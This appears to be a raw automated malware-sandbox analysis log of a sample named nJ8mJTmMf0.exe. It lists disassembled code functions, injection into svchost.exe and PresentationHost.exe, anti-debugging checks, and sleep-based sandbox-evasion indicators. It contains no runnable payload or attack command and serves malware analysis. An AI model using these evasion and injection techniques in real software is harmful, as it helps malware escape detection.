Source: nJ8mJTmMf0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: nJ8mJTmMf0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: nJ8mJTmMf0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: nJ8mJTmMf0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: nJ8mJTmMf0.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0067C304 LoadLibraryA,GetProcAddress, 0_2_0067C304
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00668719 push FFFFFF8Bh; iretd 0_2_0066871B
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062E94F push edi; ret 0_2_0062E951
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062EA68 push esi; ret 0_2_0062EA6A
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00628B85 push ecx; ret 0_2_00628B98
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062EC43 push esi; ret 0_2_0062EC45
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0062ED2C push edi; ret 0_2_0062ED2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004070DB push gs; retf 1_2_004071B5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004130B3 push es; iretd 1_2_0041326B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00407134 push gs; retf 1_2_004071B5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00403210 push eax; ret 1_2_00403212
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00408347 push 62E932ECh; ret 1_2_00408350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040734F push cs; iretd 1_2_00407359
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00422C63 push edi; iretd 1_2_00422C6E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040742D push cs; iretd 1_2_0040742E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416483 push ebx; iretd 1_2_00416485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00407551 push eax; ret 1_2_00407552
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004135E3 push esi; ret 1_2_004135EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00413FD0 push dword ptr [eax+3Bh]; ret 1_2_00413FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0320225F pushad ; ret 1_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032027FA pushad ; ret 1_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx 1_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0320283D push eax; iretd 1_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0320135E push eax; iretd 1_2_03201369
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082FC83F pushfd ; ret 3_2_082FC840
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082ED067 push esi; ret 3_2_082ED073
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082F9C9C push esp; iretd 3_2_082F9CA0
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082ECCC7 push es; iretd 3_2_082ECCEF
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082FCDAD push ds; iretd 3_2_082FCDEE
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082FC6E7 push edi; iretd 3_2_082FC6F2
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe Code function: 3_2_082EFF07 push ebx; iretd 3_2_082EFF09
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_04EE27FA pushad ; ret 6_2_04EE27F9
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00604A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00604A35
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_006855FD
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006233C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_006233C7
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe API/Special instruction interceptor: Address: 3943244
Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\PresentationHost.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0327096E rdtsc 1_2_0327096E
Source: C:\Windows\SysWOW64\PresentationHost.exe Window / User API: threadDelayed 2165 Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Window / User API: threadDelayed 7808 Jump to behavior
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe API coverage: 4.7 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\PresentationHost.exe API coverage: 2.6 %
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684 Thread sleep time: -80000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684 Thread sleep time: -42000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684 Thread sleep time: -35000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668 Thread sleep count: 2165 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668 Thread sleep time: -4330000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668 Thread sleep count: 7808 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668 Thread sleep time: -15616000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PresentationHost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00664696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00664696
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066C93C FindFirstFileW,FindClose, 0_2_0066C93C
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0066C9C7
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0066F200
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0066F35D
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0066F65E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00663A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00663A2B
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00663D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00663D4E
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0066BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0066BF27
Source: C:\Windows\SysWOW64\PresentationHost.exe Code function: 6_2_00B1BDA0 FindFirstFileW,FindNextFileW,FindClose, 6_2_00B1BDA0
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00604AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00604AFE
Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121513549.0000000001690000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000007.00000002.2316444293.0000026B9684C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0327096E rdtsc 1_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004175E3 LdrLoadDll, 1_2_004175E3
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_006741FD BlockInput, 0_2_006741FD
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00603B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00603B4C
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_00635CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00635CCC
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_0067C304 LoadLibraryA,GetProcAddress, 0_2_0067C304
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_03943510 mov eax, dword ptr fs:[00000030h] 0_2_03943510
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_039434B0 mov eax, dword ptr fs:[00000030h] 0_2_039434B0
Source: C:\Users\user\Desktop\nJ8mJTmMf0.exe Code function: 0_2_03941E70 mov eax, dword ptr fs:[00000030h] 0_2_03941E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h] 1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03308324 mov ecx, dword ptr fs:[00000030h] 1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h] 1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h] 1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h] 1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h] 1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h] 1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h] 1_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h] 1_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D437C mov eax, dword ptr fs:[00000030h] 1_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h] 1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] 1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] 1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] 1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h] 1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] 1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h] 1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h] 1_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h] 1_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0330634F mov eax, dword ptr fs:[00000030h] 1_2_0330634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h] 1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h] 1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h] 1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325438F mov eax, dword ptr fs:[00000030h] 1_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0325438F mov eax, dword ptr fs:[00000030h] 1_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h] 1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h] 1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h] 1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] 1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] 1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] 1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] 1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] 1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] 1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] 1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] 1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032663FF mov eax, dword ptr fs:[00000030h] 1_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h] 1_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h] 1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h] 1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h] 1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h] 1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h] 1_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h] 1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h] 1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h] 1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h] 1_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h] 1_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322823B mov eax, dword ptr fs:[00000030h] 1_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h] 1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h] 1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h] 1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322826B mov eax, dword ptr fs:[00000030h] 1_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] 1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h] 1_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h] 1_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0330625D mov eax, dword ptr fs:[00000030h] 1_2_0330625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h] 1_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03236259 mov eax, dword ptr fs:[00000030h] 1_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h] 1_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h] 1_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h] 1_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h] 1_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] 1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_032C62A0
